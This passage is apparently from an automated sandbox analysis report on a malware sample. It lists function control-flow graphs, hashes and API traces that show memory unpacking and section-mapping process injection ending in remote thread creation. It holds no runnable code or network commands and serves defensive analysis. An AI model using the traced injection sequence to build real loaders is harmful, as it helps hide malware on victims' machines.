                                                                                                                                        control_flow_graph 0 5b003c-5b0047 1 5b0049 0->1 2 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 0->2 1->2 17 5b028b-5b0292 2->17 18 5b0265-5b0289 call 5b0a69 2->18 20 5b02a1-5b02b0 17->20 22 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 18->22 20->22 23 5b02b2-5b02cc 20->23 29 5b03d1-5b03e0 22->29 23->20 30 5b0439-5b04b8 VirtualFree 29->30 31 5b03e2-5b0437 call 5b0ce7 29->31 32 5b04be-5b04cd 30->32 33 5b05f4-5b05fe 30->33 31->29 36 5b04d3-5b04dd 32->36 37 5b077f-5b0789 33->37 38 5b0604-5b060d 33->38 36->33 40 5b04e3-5b0505 36->40 41 5b078b-5b07a3 37->41 42 5b07a6-5b07b0 37->42 38->37 43 5b0613-5b0637 38->43 51 5b0517-5b0520 40->51 52 5b0507-5b0515 40->52 41->42 44 5b086e-5b08be LoadLibraryA 42->44 45 5b07b6-5b07cb 42->45 46 5b063e-5b0648 43->46 50 5b08c7-5b08f9 44->50 48 5b07d2-5b07d5 45->48 46->37 49 5b064e-5b065a 46->49 53 5b07d7-5b07e0 48->53 54 5b0824-5b0833 48->54 49->37 55 5b0660-5b066a 49->55 56 5b08fb-5b0901 50->56 57 5b0902-5b091d 50->57 58 5b0526-5b0547 51->58 52->58 59 5b07e2 53->59 60 5b07e4-5b0822 53->60 62 5b0839-5b083c 54->62 61 5b067a-5b0689 55->61 56->57 63 5b054d-5b0550 58->63 59->54 60->48 64 5b068f-5b06b2 61->64 65 5b0750-5b077a 61->65 62->44 66 5b083e-5b0847 62->66 68 5b05e0-5b05ef 63->68 69 5b0556-5b056b 63->69 70 5b06ef-5b06fc 64->70 71 5b06b4-5b06ed 64->71 65->46 72 5b084b-5b086c 66->72 73 5b0849 66->73 68->36 76 5b056f-5b057a 69->76 77 5b056d 69->77 74 5b074b 70->74 75 5b06fe-5b0748 70->75 71->70 72->62 73->44 74->61 75->74 80 5b059b-5b05bb 76->80 81 5b057c-5b0599 76->81 77->68 84 5b05bd-5b05db 80->84 81->84 84->63
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5b0000_35DB.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14
                                                                                                                                        Function 00783965 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 436 783965-78397e 437 783980-783982 436->437 438 783989-783995 CreateToolhelp32Snapshot 437->438 439 783984 437->439 440 7839a5-7839b2 Module32First 438->440 441 783997-78399d 438->441 439->438 442 7839bb-7839c3 440->442 443 7839b4-7839b5 call 783624 440->443 441->440 447 78399f-7839a3 441->447 448 7839ba 443->448 447->437 447->440 448->442
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0078398D
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 007839AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Offset: 00771000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_771000_35DB.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: 85b03b0c8621d4375719d3b5254873c8be134c6e19c2e2b9ac4bb0a6861179dc
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 45F062352407106BE7203ABD988DB6AB6EDAF49B28F100628E692911C0DBB8FD454761
                                                                                                                                        Function 005B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 449 5b0e0f-5b0e24 SetErrorMode * 2 450 5b0e2b-5b0e2c 449->450 451 5b0e26 449->451 451->450
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5b0000_35DB.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5
                                                                                                                                        Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 452 4019c0-4019c6 453 4019e7-401a10 452->453 454 4019c8-4019dd call 40127e 452->454 462 401a13-401a46 call 40127e Sleep call 4014fb 453->462 463 401a09-401a0c 453->463 471 401a55-401a5b 462->471 472 401a48-401a50 call 4015fb 462->472 463->462 475 401a60-401a65 471->475 476 401a69 471->476 472->471 477 401a6c-401a9a call 40127e 475->477 476->475 476->477
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                                                        • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                                                        • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                                                        • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                                        Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 486 4019e0-401a10 492 401a13-401a46 call 40127e Sleep call 4014fb 486->492 493 401a09-401a0c 486->493 501 401a55-401a5b 492->501 502 401a48-401a50 call 4015fb 492->502 493->492 505 401a60-401a65 501->505 506 401a69 501->506 502->501 507 401a6c-401a9a call 40127e 505->507 506->505 506->507
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                                        • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                                        Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 516 4019eb-401a10 520 401a13-401a46 call 40127e Sleep call 4014fb 516->520 521 401a09-401a0c 516->521 529 401a55-401a5b 520->529 530 401a48-401a50 call 4015fb 520->530 521->520 533 401a60-401a65 529->533 534 401a69 529->534 530->529 535 401a6c-401a9a call 40127e 533->535 534->533 534->535
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                                        • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                                                        Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 544 401a04-401a46 call 40127e Sleep call 4014fb 553 401a55-401a5b 544->553 554 401a48-401a50 call 4015fb 544->554 557 401a60-401a65 553->557 558 401a69 553->558 554->553 559 401a6c-401a9a call 40127e 557->559 558->557 558->559
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                                        • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                                        Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                                        • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                                        Function 00783624 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00783675
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Offset: 00771000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_771000_35DB.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: ccc185c6198837f27c78659ab99423e27a059c29106c86895baa4e569c26c584
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 59112B79A40208FFDB01DF98C989E99BBF5AF08750F058094F9489B362D375EA50DF80
                                                                                                                                        Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                                        • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                                        Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                                        • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00403433 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: s
                                                                                                                                        • API String ID: 0-453955339
                                                                                                                                        • Opcode ID: 71b633ba4f9f8731a939a5851b7279f95dc9d6686ed9ffb90a7f89efaee57644
                                                                                                                                        • Instruction ID: 478a38fdc0080eac584d4b10ddc2a57a0ee86f9b8276d2a3f71006c7e8c0dea8
                                                                                                                                        • Opcode Fuzzy Hash: 71b633ba4f9f8731a939a5851b7279f95dc9d6686ed9ffb90a7f89efaee57644
                                                                                                                                        • Instruction Fuzzy Hash: 4F5176328083D19FC713DE788854596BFB59F17315B0905EBC480EF6E3D32AAA05C7A6
                                                                                                                                        Function 00401E65 Relevance: .0, Instructions: 37COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d21c630cb6501ad70d911e8ac2028ca453459510ec33b2a00306ff3c301efda3
                                                                                                                                        • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                                                                                        • Opcode Fuzzy Hash: d21c630cb6501ad70d911e8ac2028ca453459510ec33b2a00306ff3c301efda3
                                                                                                                                        • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:32.7%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:147
                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                        execution_graph 3386 4019c0 3387 4019c8 3386->3387 3388 4019e7 3386->3388 3389 401a29 Sleep 3388->3389 3390 4014fb 7 API calls 3389->3390 3391 401a44 3390->3391 3392 4015fb 7 API calls 3391->3392 3393 401a55 3391->3393 3392->3393 3330 402f42 3332 402f18 3330->3332 3331 4019e0 15 API calls 3333 40304f 3331->3333 3332->3331 3332->3333 3346 403103 3347 403246 3346->3347 3348 40312d 3346->3348 3348->3347 3349 4031f0 RtlCreateUserThread NtTerminateProcess 3348->3349 3349->3347 3187 1fa003c 3188 1fa0049 3187->3188 3200 1fa0e0f SetErrorMode SetErrorMode 3188->3200 3193 1fa0265 3194 1fa02ce VirtualProtect 3193->3194 3196 1fa030b 3194->3196 3195 1fa0439 VirtualFree 3199 1fa04be LoadLibraryA 3195->3199 3196->3195 3198 1fa08c7 3199->3198 3201 1fa0223 3200->3201 3202 1fa0d90 3201->3202 3203 1fa0dad 3202->3203 3204 1fa0dbb GetPEB 3203->3204 3205 1fa0238 VirtualAlloc 3203->3205 3204->3205 3205->3193 3264 401606 3264->3264 3265 401609 3264->3265 3266 4016af NtDuplicateObject 3265->3266 3275 4017cb 3265->3275 3267 4016cc NtCreateSection 3266->3267 3266->3275 3268 4016f2 NtMapViewOfSection 3267->3268 3269 40174c NtCreateSection 3267->3269 3268->3269 3270 401715 NtMapViewOfSection 3268->3270 3271 401778 3269->3271 3269->3275 3270->3269 3272 401733 3270->3272 3273 401782 NtMapViewOfSection 3271->3273 3271->3275 3272->3269 3274 4017a9 NtMapViewOfSection 3273->3274 3273->3275 3274->3275 3276 401613 3277 40161c 3276->3277 3278 4016af NtDuplicateObject 3277->3278 3287 4017cb 3277->3287 3279 4016cc NtCreateSection 3278->3279 3278->3287 3280 4016f2 NtMapViewOfSection 3279->3280 3281 40174c NtCreateSection 3279->3281 3280->3281 3282 401715 NtMapViewOfSection 3280->3282 3283 401778 3281->3283 3281->3287 3282->3281 3284 401733 3282->3284 3285 401782 NtMapViewOfSection 3283->3285 3283->3287 3284->3281 3286 4017a9 NtMapViewOfSection 3285->3286 3285->3287 3286->3287 3206 403257 3207 4031f0 RtlCreateUserThread NtTerminateProcess 3206->3207 3209 403261 3206->3209 3208 403246 3207->3208 3209->3209 3314 402ed9 3316 402e8d 3314->3316 3315 4019e0 15 API calls 3317 40304f 3315->3317 3316->3314 3316->3315 3316->3317 3394 4019eb 3395 4019f0 3394->3395 3396 401a29 Sleep 3395->3396 3397 4014fb 7 API calls 3396->3397 3398 401a44 3397->3398 3399 4015fb 7 API calls 3398->3399 3400 401a55 3398->3400 3399->3400 3172 4b1bfd 3173 4b1c0c 3172->3173 3176 4b239d 3173->3176 3181 4b23b8 3176->3181 3177 4b23c1 CreateToolhelp32Snapshot 3178 4b23dd Module32First 3177->3178 3177->3181 3179 4b23ec 3178->3179 3182 4b1c15 3178->3182 3183 4b205c 3179->3183 3181->3177 3181->3178 3184 4b2087 3183->3184 3185 4b2098 VirtualAlloc 3184->3185 3186 4b20d0 3184->3186 3185->3186 3186->3186 3318 4014fa 3328 40150c 3318->3328 3319 4016af NtDuplicateObject 3320 4016cc NtCreateSection 3319->3320 3329 4015ea 3319->3329 3321 4016f2 NtMapViewOfSection 3320->3321 3322 40174c NtCreateSection 3320->3322 3321->3322 3323 401715 NtMapViewOfSection 3321->3323 3324 401778 3322->3324 3322->3329 3323->3322 3325 401733 3323->3325 3326 401782 NtMapViewOfSection 3324->3326 3324->3329 3325->3322 3327 4017a9 NtMapViewOfSection 3326->3327 3326->3329 3327->3329 3328->3319 3328->3329 3424 1fa0001 3425 1fa0005 3424->3425 3430 1fa092b GetPEB 3425->3430 3427 1fa0030 3432 1fa003c 3427->3432 3431 1fa0972 3430->3431 3431->3427 3433 1fa0049 3432->3433 3434 1fa0e0f 2 API calls 3433->3434 3435 1fa0223 3434->3435 3436 1fa0d90 GetPEB 3435->3436 3437 1fa0238 VirtualAlloc 3436->3437 3438 1fa0265 3437->3438 3439 1fa02ce VirtualProtect 3438->3439 3441 1fa030b 3439->3441 3440 1fa0439 VirtualFree 3444 1fa04be LoadLibraryA 3440->3444 3441->3440 3443 1fa08c7 3444->3443 3210 402fbe 3212 402fc3 3210->3212 3213 40304f 3212->3213 3214 4019e0 3212->3214 3215 4019e7 3214->3215 3216 401a29 Sleep 3215->3216 3221 4014fb 3216->3221 3218 401a44 3220 401a55 3218->3220 3233 4015fb 3218->3233 3220->3213 3222 40150c 3221->3222 3223 4016af NtDuplicateObject 3222->3223 3232 4015ea 3222->3232 3224 4016cc NtCreateSection 3223->3224 3223->3232 3225 4016f2 NtMapViewOfSection 3224->3225 3226 40174c NtCreateSection 3224->3226 3225->3226 3227 401715 NtMapViewOfSection 3225->3227 3228 401778 3226->3228 3226->3232 3227->3226 3229 401733 3227->3229 3230 401782 NtMapViewOfSection 3228->3230 3228->3232 3229->3226 3231 4017a9 NtMapViewOfSection 3230->3231 3230->3232 3231->3232 3232->3218 3234 40160b 3233->3234 3235 4016af NtDuplicateObject 3234->3235 3242 4017cb 3234->3242 3236 4016cc NtCreateSection 3235->3236 3235->3242 3237 4016f2 NtMapViewOfSection 3236->3237 3238 40174c NtCreateSection 3236->3238 3237->3238 3239 401715 NtMapViewOfSection 3237->3239 3240 401778 3238->3240 3238->3242 3239->3238 3241 401733 3239->3241 3240->3242 3243 401782 NtMapViewOfSection 3240->3243 3241->3238 3242->3220 3243->3242 3244 4017a9 NtMapViewOfSection 3243->3244 3244->3242 3445 1fa0005 3446 1fa092b GetPEB 3445->3446 3447 1fa0030 3446->3447 3448 1fa003c 7 API calls 3447->3448 3449 1fa0038 3448->3449

                                                                                                                                        Executed Functions

                                                                                                                                        Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
